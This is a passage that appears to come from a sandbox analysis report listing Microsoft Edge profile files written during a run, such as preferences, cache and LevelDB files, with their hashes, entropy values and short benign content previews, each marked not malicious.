                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13366271670076295","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"dips_timer_la

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF485e5.TMP (copy)

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):9496
                                                                                        Entropy (8bit):5.102198319093565
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:strkdZs6haFvrEmkO33a38WbV+FiADUrPVYJ:strSs6hCDX6PbGiPO
                                                                                        MD5:A0C2A6BB55818308AC0F5088517238CE
                                                                                        SHA1:6B1D0885663DB256E2C13F38CBF3AFADEC0F705A
                                                                                        SHA-256:0740A4D059B672C3F7314B96598E66030D66751AAB41663CEAD70C45261ABDAD
                                                                                        SHA-512:0BD215A11488F448A4248AA76FD07921F65FF55D8D5B5BE6290B266E80A9541629FE03F2D6A79F9EECE01149CFDA9F7A49C236A9DA818CFBE41B92732824415B
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13366271670076295","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"dips_timer_la

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF4bca5.TMP (copy)

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):9496
                                                                                        Entropy (8bit):5.102198319093565
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:strkdZs6haFvrEmkO33a38WbV+FiADUrPVYJ:strSs6hCDX6PbGiPO
                                                                                        MD5:A0C2A6BB55818308AC0F5088517238CE
                                                                                        SHA1:6B1D0885663DB256E2C13F38CBF3AFADEC0F705A
                                                                                        SHA-256:0740A4D059B672C3F7314B96598E66030D66751AAB41663CEAD70C45261ABDAD
                                                                                        SHA-512:0BD215A11488F448A4248AA76FD07921F65FF55D8D5B5BE6290B266E80A9541629FE03F2D6A79F9EECE01149CFDA9F7A49C236A9DA818CFBE41B92732824415B
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13366271670076295","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"dips_timer_la

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\PriceComparison\PriceComparisonAssetStore.db\000001.dbtmp

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):16
                                                                                        Entropy (8bit):3.2743974703476995
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:MANIFEST-000001.

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\PriceComparison\PriceComparisonAssetStore.db\000003.log

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:data
                                                                                        Category:modified
                                                                                        Size (bytes):83572
                                                                                        Entropy (8bit):5.6640959235673245
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:zL0/Ry7vm2lhq4ljc+PjfOzBu+RMDVogUlcPCcBjjmny8dLA8j7baD7:zL6yLm2fq4pc+rCAogU2CcBjj3YAg7mn
                                                                                        MD5:6499E52311337076E62A68FB6C4287AB
                                                                                        SHA1:D999C8B52370A1E2434B3562AD4B1220F7557484
                                                                                        SHA-256:E1FA5636DC586137F74899F6B9E7B1276B630BE9B83390F2B1AF99702F61A999
                                                                                        SHA-512:4A41BDB9E5E3483DD920510ABB6BF2D4A31D8640CF61F1772A3B7008E3C1590124402BEB87005E74B1AE77A60B7804ACB6CE529CCDBA2C90401C289E2FC70B6D
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:...m.................DB_VERSION.1...9j...............(QUERY_TIMESTAMP:product_category_en1.*.*.13366271685863075..QUERY:product_category_en1.*.*..[{"name":"product_category_en","url":"https://edgeassetservice.azureedge.net/assets/product_category_en/1.0.0/asset?assetgroup=ProductCategories","version":{"major":1,"minor":0,"patch":0},"hash":"r2jWYy3aqoi3+S+aPyOSfXOCPeLSy5AmAjNHvYRv9Hg=","size":82989}]...yg~..............!ASSET_VERSION:product_category_en.1.0.0..ASSET:product_category_en...."..3....Car & Garage..Belts & Hoses.#..+....Sports & Outdoors..Air Pumps.!.."....Car & Garage..Body Styling.4..5./..Gourmet Food & Chocolate..Spices & Seasonings.'..,."..Sports & Outdoors..Sleeping Gear.!..6....Lawn & Garden..Hydroponics.9.a.5..Books & Magazines. Gay & Lesbian Interest Magazines....+....Office Products..Pins.,..3.'..Kitchen & Housewares..Coffee Grinders.$..#....Computing..Enterprise Servers.#..&....Home Furnishings..Footboards.6...2..Books & Magazines..Computer & Internet Magazines.)..

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\PriceComparison\PriceComparisonAssetStore.db\CURRENT (copy)

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):16
                                                                                        Entropy (8bit):3.2743974703476995
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:MANIFEST-000001.

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\PriceComparison\PriceComparisonAssetStore.db\LOG

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):313
                                                                                        Entropy (8bit):5.134044882011821
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:BMki5B1N723oH+TcwtgctZQInvB2KLlrMkY+q2PN723oH+TcwtgctZQInvIFUv:IaYebgGZznvFLC+vVaYebgGZznQFUv
                                                                                        MD5:7C8809F284F7EDC1A95AF01C593D31CB
                                                                                        SHA1:030C02B4F0E59552A5F073E81CDEA30621090B16
                                                                                        SHA-256:1387E8A8ECAFFD843DDE29E0650C4ED5C7C0BF7DD9F17D65821372ECCE623B2D
                                                                                        SHA-512:A823F94290D9E3B53FF8D2FE1D16565D33F4A464813C6DFDA6D98520E978A71CBAF3FB7FAB17F7B23EF2440455C41A65A246578EC1CE7782D004F934065F920A
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:2024/07/24-01:14:44.261 232c Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\PriceComparisonAssetStore.db since it was missing..2024/07/24-01:14:44.928 232c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\PriceComparisonAssetStore.db/MANIFEST-000001.

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\PriceComparison\PriceComparisonAssetStore.db\MANIFEST-000001

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:OpenPGP Secret Key
                                                                                        Category:dropped
                                                                                        Size (bytes):41
                                                                                        Entropy (8bit):4.704993772857998
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                        MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                        SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                        SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                        SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:.|.."....leveldb.BytewiseComparator......

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):24691
                                                                                        Entropy (8bit):5.568003879191055
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:7rTzUvWF8W5w6Bf4bK8F1+UoAYDCx9Tuqh0VfUC9xbog/OVP3nIOTAarwX0p+tuQ:7HIvS8Wa6BfCKu1ja6XEfNt/
                                                                                        MD5:D09312259E4A97A24FE75C390E1A9708
                                                                                        SHA1:90FD23BBD2C1A9446BADC82EB7D585F000D0D707
                                                                                        SHA-256:9F0A73F743C9768CC48F0E5DFFAF3652266547A31AB87034A4DBEE3E8C58463D
                                                                                        SHA-512:7AA342A807CFBDB26F11C32C6C84F684221F34DA4CCA04A8A03F0600187A7083AC29956B451AE1BA9DDD10826BC076FBC6D15850CF5E43A9D2CB46101F77374E
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13366271669386045","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13366271669386045","location":5,"ma

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF3fa3f.TMP (copy)

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):24691
                                                                                        Entropy (8bit):5.568003879191055
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:7rTzUvWF8W5w6Bf4bK8F1+UoAYDCx9Tuqh0VfUC9xbog/OVP3nIOTAarwX0p+tuQ:7HIvS8Wa6BfCKu1ja6XEfNt/
                                                                                        MD5:D09312259E4A97A24FE75C390E1A9708
                                                                                        SHA1:90FD23BBD2C1A9446BADC82EB7D585F000D0D707
                                                                                        SHA-256:9F0A73F743C9768CC48F0E5DFFAF3652266547A31AB87034A4DBEE3E8C58463D
                                                                                        SHA-512:7AA342A807CFBDB26F11C32C6C84F684221F34DA4CCA04A8A03F0600187A7083AC29956B451AE1BA9DDD10826BC076FBC6D15850CF5E43A9D2CB46101F77374E
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13366271669386045","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13366271669386045","location":5,"ma

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF42ab6.TMP (copy)

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):24691
                                                                                        Entropy (8bit):5.568003879191055
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:7rTzUvWF8W5w6Bf4bK8F1+UoAYDCx9Tuqh0VfUC9xbog/OVP3nIOTAarwX0p+tuQ:7HIvS8Wa6BfCKu1ja6XEfNt/
                                                                                        MD5:D09312259E4A97A24FE75C390E1A9708
                                                                                        SHA1:90FD23BBD2C1A9446BADC82EB7D585F000D0D707
                                                                                        SHA-256:9F0A73F743C9768CC48F0E5DFFAF3652266547A31AB87034A4DBEE3E8C58463D
                                                                                        SHA-512:7AA342A807CFBDB26F11C32C6C84F684221F34DA4CCA04A8A03F0600187A7083AC29956B451AE1BA9DDD10826BC076FBC6D15850CF5E43A9D2CB46101F77374E
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13366271669386045","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13366271669386045","location":5,"ma

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):270336
                                                                                        Entropy (8bit):0.0012471779557650352
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                        MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                        SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                        SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                        SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):270336
                                                                                        Entropy (8bit):0.0012471779557650352
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                        MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                        SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                        SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                        SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\10acc543-7fed-49df-adf4-2fe66edd9bb3.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):2
                                                                                        Entropy (8bit):1.0
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:H:H
                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:[]

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\20b72d10-6544-45ee-a06b-53f76573f556.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):40
                                                                                        Entropy (8bit):4.1275671571169275
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                        MD5:20D4B8FA017A12A108C87F540836E250
                                                                                        SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                        SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                        SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\7bbe518f-728c-4947-bd02-8c6455c181f6.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):2
                                                                                        Entropy (8bit):1.0
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:H:H
                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:[]

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):2
                                                                                        Entropy (8bit):1.0
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:H:H
                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:[]

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF3edad.TMP (copy)

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):2
                                                                                        Entropy (8bit):1.0
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:H:H
                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:[]

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF40358.TMP (copy)

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):2
                                                                                        Entropy (8bit):1.0
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:H:H
                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:[]

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):40
                                                                                        Entropy (8bit):4.1275671571169275
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                        MD5:20D4B8FA017A12A108C87F540836E250
                                                                                        SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                        SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                        SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\c998c57c-0ac6-4a62-8a53-2ebc5d687373.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):2
                                                                                        Entropy (8bit):1.0
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:H:H
                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:[]

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\a615e596-4e82-4f8a-a9b9-703268ccc053.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):10514
                                                                                        Entropy (8bit):5.208096423260866
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:stFkdZs6haFvrENbdxPko33a38WbV+FMBQAbUrPVYJ:stFSs6hCDEhT6PbGqQZO
                                                                                        MD5:15204618FA5BAD63F1CAFB506B647143
                                                                                        SHA1:27A894F68143199D133CAB0EACB819FF140E185D
                                                                                        SHA-256:5C1FF179F1525F3B091FC57B3B2D0619DBC529931885633BBE0B1A75B80FA4EE
                                                                                        SHA-512:DB7D8BD08ECB3FE75DDFDABC53A920891C30C6C12A9C1065543A32181DD3BDB9FA4A3BEDAAA229F1516B1C8D1F360C19C4D8AF899A15CEC90B5C67057C508133
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13366271670076295","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"li

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

